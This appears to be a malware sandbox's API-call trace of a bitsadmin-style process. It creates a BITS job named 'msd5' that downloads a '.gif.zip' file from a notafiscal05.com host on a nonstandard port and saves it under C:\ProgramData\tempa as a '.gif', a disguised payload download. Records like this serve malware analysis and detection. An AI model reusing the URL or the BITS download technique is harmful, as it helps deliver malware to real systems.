region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 1691
start_va = 0x820000
end_va = 0xaeefff
entry_point = 0x820000
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 1692
start_va = 0x75060000
end_va = 0x7506dfff
entry_point = 0x75060000
region_type = mapped_file
name = "rpcrtremote.dll"
filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll")
Region:
id = 1693
start_va = 0x450000
end_va = 0x48ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000450000"
filename = ""
Region:
id = 1694
start_va = 0xb20000
end_va = 0xb5ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000b20000"
filename = ""
Region:
id = 1695
start_va = 0x7ffdb000
end_va = 0x7ffdbfff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffdb000"
filename = ""
Region:
id = 1696
start_va = 0x7ffdc000
end_va = 0x7ffdcfff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffdc000"
filename = ""
Region:
id = 1697
start_va = 0x6f8b0000
end_va = 0x6f8b8fff
entry_point = 0x6f8b0000
region_type = mapped_file
name = "qmgrprxy.dll"
filename = "\\Windows\\System32\\qmgrprxy.dll" (normalized: "c:\\windows\\system32\\qmgrprxy.dll")
Thread:
id = 162
os_tid = 0xcd8
[0071.953] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x6fe3c | out: lpSystemTimeAsFileTime=0x6fe3c*(dwLowDateTime=0xdb7ea710, dwHighDateTime=0x1d469c7))
[0071.953] GetCurrentProcessId () returned 0xcd4
[0071.954] GetCurrentThreadId () returned 0xcd8
[0071.954] GetTickCount () returned 0x1fe7a
[0071.954] QueryPerformanceCounter (in: lpPerformanceCount=0x6fe34 | out: lpPerformanceCount=0x6fe34*=1814589900000) returned 1
[0071.954] GetModuleHandleA (lpModuleName=0x0) returned 0xe30000
[0071.954] __set_app_type (_Type=0x1)
[0071.954] __p__fmode () returned 0x757a31f4
[0071.954] __p__commode () returned 0x757a31fc
[0071.954] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xe57f33) returned 0x0
[0071.955] __wgetmainargs (in: _Argc=0xe70824, _Argv=0xe7082c, _Env=0xe70828, _DoWildCard=0, _StartInfo=0xe70838 | out: _Argc=0xe70824, _Argv=0xe7082c, _Env=0xe70828) returned 0
[0071.955] _onexit (_Func=0xe5925e) returned 0xe5925e
[0071.955] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0071.955] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb
[0071.955] AitLogFeatureUsageByApp () returned 0x0
[0071.956] VerSetConditionMask (ConditionMask=0x0, TypeMask=0x0, Condition=0x2) returned 0x18
[0071.956] VerSetConditionMask (ConditionMask=0x18, TypeMask=0x80000000, Condition=0x1) returned 0x1b
[0071.956] VerifyVersionInfoW (in: lpVersionInformation=0x6fcb0, dwTypeMask=0x3, dwlConditionMask=0x1b | out: lpVersionInformation=0x6fcb0) returned 1
[0071.956] SetLastError (dwErrCode=0x0)
[0071.956] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75370000
[0071.956] GetProcAddress (hModule=0x75370000, lpProcName="HeapSetInformation") returned 0x753c4157
[0071.956] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1
[0071.956] GetCurrentProcess () returned 0xffffffff
[0071.956] GetCurrentThread () returned 0xfffffffe
[0071.956] GetCurrentProcess () returned 0xffffffff
[0071.956] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0xfffffffe, hTargetProcessHandle=0xffffffff, lpTargetHandle=0xe5c3b0, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0xe5c3b0*=0x80) returned 1
[0071.956] SetConsoleCtrlHandler (HandlerRoutine=0xe474cb, Add=1) returned 1
[0071.957] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75370000
[0071.957] GetProcAddress (hModule=0x75370000, lpProcName="SetThreadUILanguage") returned 0x753c24c2
[0071.957] SetThreadUILanguage (LangId=0x0) returned 0x409
[0071.957] _wsetlocale (category=1, locale=".OCP") returned="English_United States.437"
[0071.958] _wsetlocale (category=3, locale=".OCP") returned="English_United States.437"
[0071.958] _wsetlocale (category=4, locale=".OCP") returned="English_United States.437"
[0071.958] _wsetlocale (category=5, locale=".OCP") returned="English_United States.437"
[0071.958] _wcsicmp (_String1="/transfer", _String2="/RAWRETURN") returned 2
[0071.958] _wcsicmp (_String1="/transfer", _String2="/WRAP") returned -3
[0071.958] _wcsicmp (_String1="/transfer", _String2="/NOWRAP") returned 6
[0071.959] swprintf_s (in: _Dst=0x6fda8, _SizeInWords=0x12, _Format="%u.%u.%u" | out: _Dst="7.5.7601") returned 8
[0071.959] GetFileType (hFile=0x7) returned 0x2
[0071.959] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x6fd1c | out: lpMode=0x6fd1c) returned 1
[0071.959] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xe643c4*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x6fd4c, lpReserved=0x0 | out: lpBuffer=0xe643c4*, lpNumberOfCharsWritten=0x6fd4c*=0x2) returned 1
[0071.959] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xe643c4*, nNumberOfCharsToWrite=0x24, lpNumberOfCharsWritten=0x6fd58, lpReserved=0x0 | out: lpBuffer=0xe643c4*, lpNumberOfCharsWritten=0x6fd58*=0x24) returned 1
[0071.959] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xe643c4*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x6fd5c, lpReserved=0x0 | out: lpBuffer=0xe643c4*, lpNumberOfCharsWritten=0x6fd5c*=0x1e) returned 1
[0071.960] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xe643c4*, nNumberOfCharsToWrite=0x29, lpNumberOfCharsWritten=0x6fd60, lpReserved=0x0 | out: lpBuffer=0xe643c4*, lpNumberOfCharsWritten=0x6fd60*=0x29) returned 1
[0071.960] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xe643c4*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x6fd64, lpReserved=0x0 | out: lpBuffer=0xe643c4*, lpNumberOfCharsWritten=0x6fd64*=0x2) returned 1
[0071.960] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xe643c4*, nNumberOfCharsToWrite=0x5e, lpNumberOfCharsWritten=0x6fd68, lpReserved=0x0 | out: lpBuffer=0xe643c4*, lpNumberOfCharsWritten=0x6fd68*=0x5e) returned 1
[0071.960] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xe643c4*, nNumberOfCharsToWrite=0x58, lpNumberOfCharsWritten=0x6fd6c, lpReserved=0x0 | out: lpBuffer=0xe643c4*, lpNumberOfCharsWritten=0x6fd6c*=0x58) returned 1
[0071.960] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xe643c4*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x6fd70, lpReserved=0x0 | out: lpBuffer=0xe643c4*, lpNumberOfCharsWritten=0x6fd70*=0x2) returned 1
[0071.960] CoInitializeEx (pvReserved=0x0, dwCoInit=0x2) returned 0x0
[0071.971] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
[0071.971] GetNumberOfConsoleInputEvents (in: hConsoleInput=0x3, lpNumberOfEvents=0x6fdbc | out: lpNumberOfEvents=0x6fdbc) returned 1
[0071.971] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
[0071.971] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0xe5c3a8 | out: lpMode=0xe5c3a8) returned 1
[0071.972] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0xe5c390 | out: lpConsoleScreenBufferInfo=0xe5c390) returned 1
[0071.972] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0xe5c38c | out: lpMode=0xe5c38c) returned 1
[0071.972] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
[0071.972] _wcsicmp (_String1="/transfer", _String2="/HELP") returned 12
[0071.972] _wcsicmp (_String1="/transfer", _String2="/?") returned 53
[0071.972] _wcsicmp (_String1="/transfer", _String2="/UTIL") returned -1
[0071.972] _wcsicmp (_String1="/transfer", _String2="/LIST") returned 8
[0071.972] _wcsicmp (_String1="/transfer", _String2="/MONITOR") returned 7
[0071.972] _wcsicmp (_String1="/transfer", _String2="/RESET") returned 2
[0071.972] _wcsicmp (_String1="/transfer", _String2="/TRANSFER") returned 0
[0071.972] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x1) returned 1
[0071.973] _wcsicmp (_String1="/priority", _String2="/UPLOAD") returned -5
[0071.973] _wcsicmp (_String1="/priority", _String2="/DOWNLOAD") returned 12
[0071.973] _wcsicmp (_String1="/priority", _String2="/PRIORITY") returned 0
[0071.973] _wcsicmp (_String1="foreground", _String2="FOREGROUND") returned 0
[0071.973] CoCreateInstance (in: rclsid=0xe465d4*(Data1=0x4991d34b, Data2=0x80a1, Data3=0x4291, Data4=([0]=0x83, [1]=0xb6, [2]=0x33, [3]=0x28, [4]=0x36, [5]=0x6b, [6]=0x90, [7]=0x97)), pUnkOuter=0x0, dwClsContext=0x4, riid=0xe465b4*(Data1=0x5ce34c0d, Data2=0xdc9, Data3=0x4c1f, Data4=([0]=0x89, [1]=0x7c, [2]=0xda, [3]=0xa1, [4]=0xb7, [5]=0x8c, [6]=0xee, [7]=0x7c)), ppv=0xe5c3b4 | out: ppv=0xe5c3b4*=0x20a54c) returned 0x0
[0072.011] IBackgroundCopyManager:CreateJob (in: This=0x20a54c, DisplayName="msd5", Type=0x0, pJobId=0x6fd84, ppJob=0x6fd80 | out: pJobId=0x6fd84*(Data1=0x183f6aad, Data2=0x7eb6, Data3=0x4f7b, Data4=([0]=0xb2, [1]=0x91, [2]=0xf3, [3]=0x2c, [4]=0xc5, [5]=0x33, [6]=0xcf, [7]=0xb0)), ppJob=0x6fd80*=0x20a624) returned 0x0
[0072.017] CoTaskMemAlloc (cb=0x50) returned 0x220cb0
[0072.017] IUnknown:AddRef (This=0x20a624) returned 0x2
[0072.017] IUnknown:AddRef (This=0x20a624) returned 0x3
[0072.017] PeekMessageW (in: lpMsg=0x6fcfc, hWnd=0x0, wMsgFilterMin=0x400, wMsgFilterMax=0x400, wRemoveMsg=0x0 | out: lpMsg=0x6fcfc) returned 0
[0072.017] IUnknown:Release (This=0x20a624) returned 0x2
[0072.017] IBackgroundCopyJob:SetPriority (This=0x20a624, Val=0x0) returned 0x0
[0072.020] IBackgroundCopyJob:AddFile (This=0x20a624, RemoteUrl="http://xbr6lge984320911.notafiscal05.com:25067/04/marxvxinhhmgx.gif.zip?482400544", LocalName="C:\\ProgramData\\tempa\\marxvxinhhmgx.gif") returned 0x0
[0072.029] IBackgroundCopyJob:SetNotifyFlags (This=0x20a624, Val=0xb) returned 0x0
[0072.032] IBackgroundCopyJob:SetNotifyInterface (This=0x20a624, Val=0x220cb0) returned 0x0
[0072.032] IUnknown:QueryInterface (in: This=0x220cb0, riid=0x76a63e0c*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6f800 | out: ppvObject=0x6f800*=0x0) returned 0x80004002
[0072.032] IUnknown:QueryInterface (in: This=0x220cb0, riid=0x76a63e0c*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6f7c0 | out: ppvObject=0x6f7c0*=0x0) returned 0x80004002
[0072.032] IUnknown:QueryInterface (in: This=0x220cb0, riid=0x76a597c4*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6f7a8 | out: ppvObject=0x6f7a8*=0x0) returned 0x80004002
[0072.032] IUnknown:QueryInterface (in: This=0x220cb0, riid=0x76a69b0c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6f75c | out: ppvObject=0x6f75c*=0x220cb0) returned 0x0
[0072.032] IUnknown:AddRef (This=0x220cb0) returned 0x3
[0072.032] IUnknown:QueryInterface (in: This=0x220cb0, riid=0x76a4c15c*(Data1=0x18, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6f6bc | out: ppvObject=0x6f6bc*=0x0) returned 0x80004002
[0072.032] IUnknown:QueryInterface (in: This=0x220cb0, riid=0x76a4c0a8*(Data1=0x19, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x220dc4 | out: ppvObject=0x220dc4*=0x0) returned 0x80004002
[0072.032] IUnknown:QueryInterface (in: This=0x220cb0, riid=0x76a4c16c*(Data1=0x4c1e39e1, Data2=0xe3e3, Data3=0x4296, Data4=([0]=0xaa, [1]=0x86, [2]=0xec, [3]=0x93, [4]=0x8d, [5]=0x89, [6]=0x6e, [7]=0x92)), ppvObject=0x6f6c4 | out: ppvObject=0x6f6c4*=0x0) returned 0x80004002
[0072.032] IUnknown:Release (This=0x220cb0) returned 0x2
[0072.035] IUnknown:QueryInterface (in: This=0x220cb0, riid=0x211978*(Data1=0x659cdeac, Data2=0x489e, Data3=0x11d9, Data4=([0]=0xa9, [1]=0xcd, [2]=0x0, [3]=0xd, [4]=0x56, [5]=0x96, [6]=0x52, [7]=0x51)), ppvObject=0x6ebcc | out: ppvObject=0x6ebcc*=0x0) returned 0x80004002
[0072.035] IUnknown:QueryInterface (in: This=0x220cb0, riid=0x211978*(Data1=0x97ea99c7, Data2=0x186, Data3=0x4ad4, Data4=([0]=0x8d, [1]=0xf9, [2]=0xc5, [3]=0xb4, [4]=0xe0, [5]=0xed, [6]=0x6b, [7]=0x22)), ppvObject=0x6ebcc | out: ppvObject=0x6ebcc*=0x220cb0) returned 0x0
[0072.036] IUnknown:QueryInterface (in: This=0x220cb0, riid=0x211978*(Data1=0x97ea99c7, Data2=0x186, Data3=0x4ad4, Data4=([0]=0x8d, [1]=0xf9, [2]=0xc5, [3]=0xb4, [4]=0xe0, [5]=0xed, [6]=0x6b, [7]=0x22)), ppvObject=0x218300 | out: ppvObject=0x218300*=0x220cb0) returned 0x0
[0072.038] IBackgroundCopyJob:Resume (This=0x20a624) returned 0x0
[0072.042] IUnknown:QueryInterface (in: This=0x220cb0, riid=0x76a4c17c*(Data1=0x1c733a30, Data2=0x2a1c, Data3=0x11ce, Data4=([0]=0xad, [1]=0xe5, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x44, [6]=0x77, [7]=0x3d)), ppvObject=0x6f114 | out: ppvObject=0x6f114*=0x0) returned 0x80004002
[0072.043] IBackgroundCopyCallback:JobModification (This=0x220cb0, pJob=0x20a6b4, dwReserved=0x0) returned 0x0
[0072.043] IBackgroundCopyJob:GetState (in: This=0x20a624, pVal=0x220cbc | out: pVal=0x220cbc) returned 0x0
[0072.045] IBackgroundCopyJob:GetType (in: This=0x20a624, pVal=0x6ec80 | out: pVal=0x6ec80) returned 0x0
[0072.046] IBackgroundCopyJob:GetProgress (in: This=0x20a624, pVal=0x220cc0 | out: pVal=0x220cc0) returned 0x0
[0072.046] IBackgroundCopyJob:GetPriority (in: This=0x20a624, pVal=0x6ec7c | out: pVal=0x6ec7c) returned 0x0
[0072.047] CoTaskMemFree (pv=0x0)
[0072.047] IBackgroundCopyJob:GetDisplayName (in: This=0x20a624, pVal=0x6ec94 | out: pVal=0x6ec94*="msd5") returned 0x0
[0072.048] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6ec3c | out: lpConsoleScreenBufferInfo=0x6ec3c) returned 1
[0072.048] FillConsoleOutputCharacterW (in: hConsoleOutput=0x7, cCharacter=0x20, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfCharsWritten=0x6ec54 | out: lpNumberOfCharsWritten=0x6ec54) returned 1
[0072.048] FillConsoleOutputAttribute (in: hConsoleOutput=0x7, wAttribute=0x7, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfAttrsWritten=0x6ec54 | out: lpNumberOfAttrsWritten=0x6ec54) returned 1
[0072.049] SetConsoleCursorPosition (hConsoleOutput=0x7, dwCursorPosition=0x0) returned 1
[0072.049] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0072.049] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6ec28 | out: lpConsoleScreenBufferInfo=0x6ec28) returned 1
[0072.049] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xe643c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x6ec40, lpReserved=0x0 | out: lpBuffer=0xe643c4*, lpNumberOfCharsWritten=0x6ec40*=0xa) returned 1
[0072.049] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0072.050] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6ec24 | out: lpConsoleScreenBufferInfo=0x6ec24) returned 1
[0072.050] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xe643c4*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x6ec3c, lpReserved=0x0 | out: lpBuffer=0xe643c4*, lpNumberOfCharsWritten=0x6ec3c*=0x5) returned 1
[0072.050] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0072.050] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6ec2c | out: lpConsoleScreenBufferInfo=0x6ec2c) returned 1
[0072.050] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xe643c4*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0x6ec44, lpReserved=0x0 | out: lpBuffer=0xe643c4*, lpNumberOfCharsWritten=0x6ec44*=0x7) returned 1
[0072.050] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0072.051] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6ec20 | out: lpConsoleScreenBufferInfo=0x6ec20) returned 1
[0072.051] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xe643c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x6ec38, lpReserved=0x0 | out: lpBuffer=0xe643c4*, lpNumberOfCharsWritten=0x6ec38*=0x8) returned 1
[0072.051] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0072.051] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6ec28 | out: lpConsoleScreenBufferInfo=0x6ec28) returned 1
[0072.052] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xe643c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x6ec40, lpReserved=0x0 | out: lpBuffer=0xe643c4*, lpNumberOfCharsWritten=0x6ec40*=0x8) returned 1
[0072.052] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0072.052] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6ec1c | out: lpConsoleScreenBufferInfo=0x6ec1c) returned 1
[0072.052] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xe643c4*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x6ec34, lpReserved=0x0 | out: lpBuffer=0xe643c4*, lpNumberOfCharsWritten=0x6ec34*=0xc) returned 1
[0072.052] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0072.052] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6ec2c | out: lpConsoleScreenBufferInfo=0x6ec2c) returned 1
[0072.053] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xe643c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x6ec44, lpReserved=0x0 | out: lpBuffer=0xe643c4*, lpNumberOfCharsWritten=0x6ec44*=0xa) returned 1
[0072.053] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0072.053] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6ec14 | out: lpConsoleScreenBufferInfo=0x6ec14) returned 1
[0072.053] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xe643c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x6ec2c, lpReserved=0x0 | out: lpBuffer=0xe643c4*, lpNumberOfCharsWritten=0x6ec2c*=0xa) returned 1
[0072.053] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0072.054] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6ec1c | out: lpConsoleScreenBufferInfo=0x6ec1c) returned 1
[0072.054] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xe643c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x6ec34, lpReserved=0x0 | out: lpBuffer=0xe643c4*, lpNumberOfCharsWritten=0x6ec34*=0x8) returned 1
[0072.054] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0072.054] _vsnwprintf (in: _Buffer=0xe703f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x6ec40 | out: _Buffer="0") returned 1
[0072.054] _vsnwprintf (in: _Buffer=0xe703f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x6ec4c | out: _Buffer="1") returned 1
[0072.054] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6ec1c | out: lpConsoleScreenBufferInfo=0x6ec1c) returned 1
[0072.054] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xe643c4*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x6ec34, lpReserved=0x0 | out: lpBuffer=0xe643c4*, lpNumberOfCharsWritten=0x6ec34*=0x5) returned 1
[0072.055] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0072.055] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6ec24 | out: lpConsoleScreenBufferInfo=0x6ec24) returned 1
[0072.055] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xe643c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x6ec3c, lpReserved=0x0 | out: lpBuffer=0xe643c4*, lpNumberOfCharsWritten=0x6ec3c*=0x8) returned 1
[0072.055] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0072.055] _vsnwprintf (in: _Buffer=0xe703f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x6ec48 | out: _Buffer="0") returned 1
[0072.055] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x6ec3c | out: lpSystemTimeAsFileTime=0x6ec3c*(dwLowDateTime=0xdb8f50b0, dwHighDateTime=0x1d469c7))
[0072.055] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x6ec34 | out: lpSystemTimeAsFileTime=0x6ec34*(dwLowDateTime=0xdb8f50b0, dwHighDateTime=0x1d469c7))
[0072.055] _finite (_X=0x0) returned 0
[0072.055] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6ebf4 | out: lpConsoleScreenBufferInfo=0x6ebf4) returned 1
[0072.056] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xe643c4*, nNumberOfCharsToWrite=0xd, lpNumberOfCharsWritten=0x6ec0c, lpReserved=0x0 | out: lpBuffer=0xe643c4*, lpNumberOfCharsWritten=0x6ec0c*=0xd) returned 1
[0072.056] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0072.056] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6ec00 | out: lpConsoleScreenBufferInfo=0x6ec00) returned 1
[0072.056] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xe643c4*, nNumberOfCharsToWrite=0xf, lpNumberOfCharsWritten=0x6ec18, lpReserved=0x0 | out: lpBuffer=0xe643c4*, lpNumberOfCharsWritten=0x6ec18*=0xf) returned 1
[0072.056] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0072.056] _vsnwprintf (in: _Buffer=0x6ea2c, _BufferCount=0xfe, _Format="%.2f B/S", _ArgList=0x6e9f0 | out: _Buffer="0.00 B/S") returned 8
[0072.057] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6ec44 | out: lpConsoleScreenBufferInfo=0x6ec44) returned 1
[0072.057] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xe643c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x6ec5c, lpReserved=0x0 | out: lpBuffer=0xe643c4*, lpNumberOfCharsWritten=0x6ec5c*=0x8) returned 1
[0072.057] CoTaskMemFree (pv=0x218398)
[0072.057] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
[0072.057] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
[0072.058] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x6fce0 | out: lpMode=0x6fce0) returned 1
[0072.058] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1b1) returned 1
[0072.058] MsgWaitForMultipleObjectsEx (nCount=0x1, pHandles=0x6fd20*=0x3, dwMilliseconds=0xffffffff, dwWakeMask=0x4ff, dwFlags=0x2) returned 0x1
[0072.210] PeekMessageW (in: lpMsg=0x6fcf8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6fcf8) returned 1
[0072.210] TranslateMessage (lpMsg=0x6fcf8) returned 0
[0072.210] DispatchMessageW (lpMsg=0x6fcf8) returned 0x1
[0072.210] IBackgroundCopyCallback:JobModification (This=0x220cb0, pJob=0x20a6b4, dwReserved=0x0) returned 0x0
[0072.210] IBackgroundCopyJob:GetState (in: This=0x20a624, pVal=0x220cbc | out: pVal=0x220cbc) returned 0x0
[0072.223] SetTimer (hWnd=0x0, nIDEvent=0x0, uElapse=0x3e8, lpTimerFunc=0x0) returned 0x7fbf
[0072.224] IBackgroundCopyJob:GetType (in: This=0x20a624, pVal=0x6f3c0 | out: pVal=0x6f3c0) returned 0x0
[0072.225] IBackgroundCopyCallback:JobModification (This=0x220cb0, pJob=0x20a6b4, dwReserved=0x0) returned 0x0
[0072.225] IBackgroundCopyJob:GetState (in: This=0x20a624, pVal=0x220cbc | out: pVal=0x220cbc) returned 0x0
[0072.226] IBackgroundCopyJob:GetProgress (in: This=0x20a624, pVal=0x220cc0 | out: pVal=0x220cc0) returned 0x0
[0072.227] IBackgroundCopyJob:GetPriority (in: This=0x20a624, pVal=0x6f3bc | out: pVal=0x6f3bc) returned 0x0
[0072.228] CoTaskMemFree (pv=0x0)
[0072.228] IBackgroundCopyJob:GetDisplayName (in: This=0x20a624, pVal=0x6f3d4 | out: pVal=0x6f3d4*="msd5") returned 0x0
[0072.229] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6f37c | out: lpConsoleScreenBufferInfo=0x6f37c) returned 1
[0072.229] FillConsoleOutputCharacterW (in: hConsoleOutput=0x7, cCharacter=0x20, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfCharsWritten=0x6f394 | out: lpNumberOfCharsWritten=0x6f394) returned 1
[0072.229] FillConsoleOutputAttribute (in: hConsoleOutput=0x7, wAttribute=0x7, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfAttrsWritten=0x6f394 | out: lpNumberOfAttrsWritten=0x6f394) returned 1
[0072.230] SetConsoleCursorPosition (hConsoleOutput=0x7, dwCursorPosition=0x0) returned 1
[0072.230] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0072.230] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6f368 | out: lpConsoleScreenBufferInfo=0x6f368) returned 1
[0072.230] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xe643c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x6f380, lpReserved=0x0 | out: lpBuffer=0xe643c4*, lpNumberOfCharsWritten=0x6f380*=0xa) returned 1
